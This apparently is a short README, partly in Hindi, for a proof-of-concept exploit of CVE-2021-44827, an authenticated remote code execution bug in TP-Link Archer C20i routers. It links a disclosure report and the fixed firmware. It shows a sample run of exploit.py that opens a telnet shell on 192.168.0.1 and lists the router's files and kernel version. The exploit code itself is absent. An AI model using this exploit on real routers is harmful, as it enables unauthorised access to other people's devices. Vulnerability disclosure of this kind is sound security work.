
प्रमाण-अवधारणा शोषण (Proof-of-concept exploit) प्रमाणित रिमोट कोड निष्पादन (CVE-2021-44827) के लिए, जो TP-Link Archer C20i राउटरों को लक्षित करता है। एम्बेडेड Linux उपकरणों पर पोस्ट-एक्सप्लॉइटेशन शेल एक्सेस प्रदान करता है।
CVE-2021-44827 के लिए एक PoC - Tp-link Archer C20i में प्रमाणित दूरस्थ कोड निष्पादन
विस्तृत विवरण: https://full-disclosure.eu/reports/2022/CVE-2021-44827-tplink-authenticated-remote-code-execution.html
$ python exploit.py [error]0 [error]0 Run post_exploit_cmd Trying 192.168.0.1... Connected to 192.168.0.1 Escape character is '^]' ~ # ~ # ls web usr sbin mnt lib dev var sys proc linuxrc etc bin ~ # id sh: id: not found ~ # uname -a sh: uname: not found ~ # cat /proc/version Linux version 2.6.36 ([email protected]) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #1 Tue Feb 21 14:47:04 HKT 2017
इस संस्करण में ठीक किया गया: https://static.tp-link.com/upload/firmware/2022/202202/20220217/Archer%20C20i(EU)_V1_220107.zip